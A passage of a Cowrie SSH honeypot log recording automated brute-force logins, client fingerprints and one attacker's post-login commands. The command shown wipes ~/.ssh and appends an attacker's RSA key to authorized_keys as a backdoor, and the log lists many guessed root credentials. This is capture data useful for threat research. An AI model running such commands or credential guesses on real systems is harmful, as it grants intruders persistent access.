fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T13:59:21.017499Z","src_ip":"212.227.125.160","session":"77f89dfb96e7"}
{"eventid":"cowrie.session.closed","duration":"12.6","message":"Connection lost after 12.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:59:27.096832Z","src_ip":"212.227.125.160","session":"ca80ccbfd0f5"}
{"eventid":"cowrie.login.failed","username":"admin","password":"password","message":"login attempt [admin/password] failed","sensor":"my-vps","timestamp":"2025-08-26T13:59:29.316666Z","src_ip":"212.227.125.160","session":"77f89dfb96e7"}
{"eventid":"cowrie.session.closed","duration":"14.3","message":"Connection lost after 14.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:59:31.096217Z","src_ip":"212.227.125.160","session":"77f89dfb96e7"}
{"eventid":"cowrie.session.closed","duration":30.713798999786377,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:59:38.195526Z","src_ip":"212.227.125.160","session":"474724380db6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34842,"dst_ip":"1.2.3.4","dst_port":22,"session":"715cd1498927","protocol":"ssh","message":"New connection: 212.227.235.229:34842 (1.2.3.4:22) [session: 715cd1498927]","sensor":"my-vps","timestamp":"2025-08-26T13:59:40.914764Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:59:41.606846Z","src_ip":"212.227.235.229","session":"715cd1498927"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T13:59:41.607571Z","src_ip":"212.227.235.229","session":"715cd1498927"}
{"eventid":"cowrie.login.success","username":"root","password":"Surya@123","message":"login attempt [root/Surya@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:59:45.133439Z","src_ip":"212.227.235.229","session":"715cd1498927"}
{"eventid":"cowrie.session.closed","duration":"6.0","message":"Connection lost after 6.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:59:46.931127Z","src_ip":"212.227.235.229","session":"715cd1498927"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52004,"dst_ip":"1.2.3.4","dst_port":22,"session":"a2e01be66c8c","protocol":"ssh","message":"New connection: 212.227.235.229:52004 (1.2.3.4:22) [session: a2e01be66c8c]","sensor":"my-vps","timestamp":"2025-08-26T14:00:05.646310Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T14:00:05.647248Z","src_ip":"212.227.235.229","session":"a2e01be66c8c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T14:00:05.881271Z","src_ip":"212.227.235.229","session":"a2e01be66c8c"}
{"eventid":"cowrie.login.failed","username":"admin","password":"princess","message":"login attempt [admin/princess] failed","sensor":"my-vps","timestamp":"2025-08-26T14:00:07.473913Z","src_ip":"212.227.235.229","session":"a2e01be66c8c"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:00:08.708639Z","src_ip":"212.227.235.229","session":"a2e01be66c8c"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:00:42.722649Z","src_ip":"87.120.191.13","session":"ef7e6a4821a0"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:00:43.160901Z","src_ip":"87.120.191.13","session":"84dadb6434aa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43040,"dst_ip":"1.2.3.4","dst_port":22,"session":"32cdfe4dac71","protocol":"ssh","message":"New connection: 212.227.235.229:43040 (1.2.3.4:22) [session: 32cdfe4dac71]","sensor":"my-vps","timestamp":"2025-08-26T14:00:52.709219Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T14:00:52.710380Z","src_ip":"212.227.235.229","session":"32cdfe4dac71"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T14:00:52.915468Z","src_ip":"212.227.235.229","session":"32cdfe4dac71"}
{"eventid":"cowrie.login.success","username":"root","password":"Fh123456","message":"login attempt [root/Fh123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T14:00:53.769241Z","src_ip":"212.227.235.229","session":"32cdfe4dac71"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T14:00:54.192947Z","src_ip":"212.227.235.229","session":"32cdfe4dac71"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T14:00:54.193680Z","src_ip":"212.227.235.229","session":"32cdfe4dac71"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T14:00:54.194905Z","src_ip":"212.227.235.229","session":"32cdfe4dac71"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:00:54.397550Z","src_ip":"212.227.235.229","session":"32cdfe4dac71"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T14:00:54.922000Z","src_ip":"212.227.235.229","session":"32cdfe4dac71"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T14:00:54.923046Z","src_ip":"212.227.235.229","session":"32cdfe4dac71"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T14:00:55.127132Z","src_ip":"212.227.235.229","session":"32cdfe4dac71"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:00:55.128385Z","src_ip":"212.227.235.229","session":"32cdfe4dac71"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44470,"dst_ip":"1.2.3.4","dst_port":22,"session":"c5b28af41912","protocol":"ssh","message":"New connection: 212.227.235.229:44470 (1.2.3.4:22) [session: c5b28af41912]","sensor":"my-vps","timestamp":"2025-08-26T14:00:55.357929Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T14:00:55.359152Z","src_ip":"212.227.235.229","session":"c5b28af41912"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T14:00:55.590345Z","src_ip":"212.227.235.229","session":"c5b28af41912"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T14:00:56.501193Z","src_ip":"212.227.235.229","session":"c5b28af41912"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:00:57.719556Z","src_ip":"212.227.235.229","session":"c5b28af41912"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46021,"dst_ip":"1.2.3.4","dst_port":22,"session":"190fb238c1e3","protocol":"ssh","message":"New connection: 212.227.235.229:46021 (1.2.3.4:22) [session: 190fb238c1e3]","sensor":"my-vps","timestamp":"2025-08-26T14:00:57.909413Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T14:00:57.910089Z","src_ip":"212.227.235.229","session":"190fb238c1e3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T14:00:58.107780Z","src_ip":"212.227.235.229","session":"190fb238c1e3"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T14:00:58.948868Z","src_ip":"212.227.235.229","session":"190fb238c1e3"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:00:59.149471Z","src_ip":"212.227.235.229","session":"190fb238c1e3"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:00:59.156149Z","src_ip":"212.227.235.229","session":"32cdfe4dac71"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:01:06.719340Z","src_ip":"87.120.191.13","session":"151ec6f7057b"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:01:06.720339Z","src_ip":"87.120.191.13","session":"51c1b9736228"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:01:17.009802Z","src_ip":"87.120.191.13","session":"a4fba35f425f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57348,"dst_ip":"1.2.3.4","dst_port":22,"session":"45adf5dd6829","protocol":"ssh","message":"New connection: 212.227.235.229:57348 (1.2.3.4:22) [session: 45adf5dd6829]","sensor":"my-vps","timestamp":"2025-08-26T14:01:39.819615Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T14:01:39.824608Z","src_ip":"212.227.235.229","session":"45adf5dd6829"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T14:01:40.066414Z","src_ip":"212.227.235.229","session":"45adf5dd6829"}
{"eventid":"cowrie.login.failed","username":"jj","password":"jj","message":"login attempt [jj/jj] failed","sensor":"my-vps","timestamp":"2025-08-26T14:01:41.040578Z","src_ip":"212.227.235.229","session":"45adf5dd6829"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:01:42.285999Z","src_ip":"212.227.235.229","session":"45adf5dd6829"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42452,"dst_ip":"1.2.3.4","dst_port":22,"session":"2e26fd03f0d2","protocol":"ssh","message":"New connection: 212.227.125.160:42452 (1.2.3.4:22) [session: 2e26fd03f0d2]","sensor":"my-vps","timestamp":"2025-08-26T14:01:57.742871Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T14:01:57.745543Z","src_ip":"212.227.125.160","session":"2e26fd03f0d2"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T14:02:04.738361Z","src_ip":"212.227.125.160","session":"2e26fd03f0d2"}
{"eventid":"cowrie.login.failed","username":"admin","password":"123456","message":"login attempt [admin/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T14:02:07.283335Z","src_ip":"212.227.125.160","session":"2e26fd03f0d2"}
{"eventid":"cowrie.session.closed","duration":"10.8","message":"Connection lost after 10.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:02:08.519329Z","src_ip":"212.227.125.160","session":"2e26fd03f0d2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48404,"dst_ip":"1.2.3.4","dst_port":22,"session":"5e38378d5922","protocol":"ssh","message":"New connection: 212.227.125.160:48404 (1.2.3.4:22) [session: 5e38378d5922]","sensor":"my-vps","timestamp":"2025-08-26T14:02:19.963528Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T14:02:20.244309Z","src_ip":"212.227.125.160","session":"5e38378d5922"}
